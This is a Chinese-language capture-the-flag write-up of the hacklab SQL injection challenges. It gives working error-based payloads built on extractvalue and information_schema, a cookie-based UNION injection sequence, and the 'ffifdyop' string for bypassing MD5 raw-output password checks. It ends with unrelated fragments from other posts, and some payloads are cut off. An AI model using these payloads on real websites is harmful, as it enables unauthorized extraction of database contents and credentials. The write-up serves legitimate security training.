hacklab注入關(
4.到底能不能回顯
構造這個語句
?start=0 procedure analyse(extractvalue(rand(),concat(1,
得到結果
xpath syntax error: 'article,user'
知道現在的資料庫中有兩個表:article和user。
現在爆破user表中的列(由於分號被過濾了,只能用16進製制的ascii編碼表示表名):
1. ?start=0 procedure analyse(extractvalue(rand(),concat(1,(select group_concat(column_name) from information_schema.columns where table_name=0x75736572))),1)%23&num=1 得到
xpath syntax error: 'id,username,password,lastloginip'
看看username
1. ?start=0 procedure analyse(extractvalue(rand(),concat(1,(select group_concat(username) from user))),1)%23&num=1
得到xpath syntax error: 'user,admin,flag'
發現了flag
1. ?start=0 procedure analyse(extractvalue(rand(),concat(1,(select group_concat(password) from user))),1)%23&num=1 得到
xpath syntax error: 'user,admin,myflagishere'
5.邂逅
把注入引數放在位址上面,而且需要使用寬位元組的方式注入
得到表名:pic
得到欄位名:picname
%23
訪問這個鏈結即可
6.errorbased
爆出表名
1. ?username=admin' and extractvalue(rand(),concat(0x3a,(select group_concat(table_name) from information_schema.tables where table_schema=database())))%23
爆出列名
?username=admin' and extractvalue(rand(),concat(0x3a,(select group_concat(column_name) from information_schema.columns where table_name='motto')))%23
查詢各列值
?username=admin' and extractvalue(rand(),concat(0x3a,(select group_concat(username) from motto)))%23
構造如下語句,利用limit查詢
1. ?username=admin' and extractvalue(rand(),concat(0x3a,(select concat(motto,0x3a) from motto limit 3,1)))%23
7.盲注
盲注學習中,先pass
8.sql注入通用防護
主要利用的是cookie
通過 order by 子句就可以得到字段數目。語句如下:
cookie: phpsessid=9f5169cbfb23ef8e10ca86f02cae97c9;id=2 order by 4
最後得到字段數目是3。
得到顯示位
cookie: phpsessid=9f5169cbfb23ef8e10ca86f02cae97c9;id=0 union select 1,2,3
得到顯示位是2,3
cookie: phpsessid=9f5169cbfb23ef8e10ca86f02cae97c9;id=0 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())
得到資料庫
cookie: phpsessid=9f5169cbfb23ef8e10ca86f02cae97c9;id=0 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='sae_manager_sqli8')
得到表的資訊、字段
得到flag
9.據說雜湊後的密碼是不能產生注入的
檢視源**
其中最關鍵的語句是 select * from user where userid=".intval($_get['userid'])." and password='".md5($_get['pwd'], true) ."' 。對傳入的userid使用了intval()函式轉化為數字,同時將password使用md5()函式進行轉化。這就是乙個典型的md5加密後的sql注入。
只要提交後變成
select * from admin wherepass= ''o
r'6'
就行了
提供乙個字串:ffifdyop
md5後,
276f722736c95d99e921722cf9ed621c
再轉成字串:
'or'6
所以構造
就可以了
DVWA SQL 注入關卡初探
給id引數賦不同的值,發現有不同的返回資訊 在引數後加 檢視報錯資訊 數字型引數左右無引號,字元型引數左右有引號 由於是字元型引數,手動對預設引數新增引號閉合。在閉合後新增布林型型別引數看是否支援 order by n 以第n列結果排序,通過列舉嘗試可判斷出返回結果的個數 有時並非所有返回結果都會顯...
網路安全實驗室注入關(到底能不能回顯wp)
參考文章 單引號上去發現被轉義了,以為是寬位元組注入,後來怎麼構造payload都不成功,看看大佬的wp發現是limit注入 修改limit暴所有表,發現有 article 和 user 兩個表 analyse extractvalue rand concat 0x7e,select distinc...
Struts2依賴注入關聯的類
containerimpl 中定義的靜態內部類 injects a field or method in a given object.inte ce injector extends serializable static class missingdependencyexception exte...